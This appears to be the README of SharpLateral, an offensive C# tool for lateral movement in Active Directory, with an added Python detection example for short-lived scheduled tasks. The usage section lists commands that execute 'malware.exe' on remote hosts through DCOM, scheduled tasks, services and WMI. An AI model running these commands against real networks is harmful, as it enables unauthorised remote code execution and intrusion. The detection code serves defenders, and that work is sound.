SharpLateral is a C# tool that implements 4 different methods for performing lateral movement in an AD environment.
This project uses the following 3rd party libraries:
- TaskScheduler: https://github.com/dahall/TaskScheduler
- Fody: https://github.com/Fody/Fody
Load the Visual Studio project up and go to "Tools" > "NuGet Package Manager" > "Package Manager Settings"
Open "NuGet Package Manager" > "Package Sources"
Install Fody: Install-Package Costura.Fody -Version 3.3.3
Install TaskScheduler: Install-Package TaskScheduler -Version 2.8.11
SharpLateral aims to perform lateral movement with the following methods:
- DCOM
- SERVICE
- WMI
- SCHEDULED TASKS
DCOM:
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
Executes the malware on the given hostname via MMC20.
Scheduled Task:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
Creates the task, executes the malware, then deletes the task.
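For defenders, the create, execute, delete sequence above leaves Security-log events 4698 (scheduled task created) and 4699 (scheduled task deleted) on the target host when auditing of "Other Object Access Events" is enabled. The following Python is an added detection example, not part of SharpLateral; the record layout, the sample events and the two-minute window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Windows Security-log event IDs for scheduled task creation and deletion.
TASK_CREATED, TASK_DELETED = 4698, 4699

# Constructed sample records, reduced to the fields this check uses.
SAMPLE_EVENTS = [
    {"time": "2024-05-02T10:15:03", "host": "SRV01", "id": 4698,
     "task": "\\TaskName", "user": "CORP\\admin1"},
    {"time": "2024-05-02T10:15:09", "host": "SRV01", "id": 4699,
     "task": "\\TaskName", "user": "CORP\\admin1"},
    {"time": "2024-05-02T11:00:00", "host": "SRV02", "id": 4698,
     "task": "\\NightlyBackup", "user": "CORP\\svc_backup"},
    {"time": "2024-05-03T11:00:00", "host": "SRV02", "id": 4699,
     "task": "\\NightlyBackup", "user": "CORP\\svc_backup"},
    # Deletion with no matching creation in the data set: ignored.
    {"time": "2024-05-02T12:30:00", "host": "SRV03", "id": 4699,
     "task": "\\Orphan", "user": "CORP\\admin2"},
]

def short_lived_tasks(events, max_lifetime=timedelta(minutes=2)):
    """Return one finding per task created and deleted within max_lifetime."""
    created = {}   # (host, task) -> (creation time, creating user)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        key = (ev["host"].lower(), ev["task"].lower())
        if ev["id"] == TASK_CREATED:
            created[key] = (when, ev["user"])
        elif ev["id"] == TASK_DELETED and key in created:
            start, creator = created.pop(key)
            if when - start <= max_lifetime:
                findings.append({
                    "host": ev["host"], "task": ev["task"],
                    "created_by": creator, "deleted_by": ev["user"],
                    "lifetime_s": int((when - start).total_seconds()),
                })
    return findings

if __name__ == "__main__":
    for finding in short_lived_tasks(SAMPLE_EVENTS):
        print(finding)
```

Tune the window to the environment: some software deployment tools also create and remove tasks quickly, so pair a finding with the creating account and source host before escalating.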
Service:
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
Creates a service and executes the malware with it.
WMI:
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
Executes the malware via WMI on the remote host.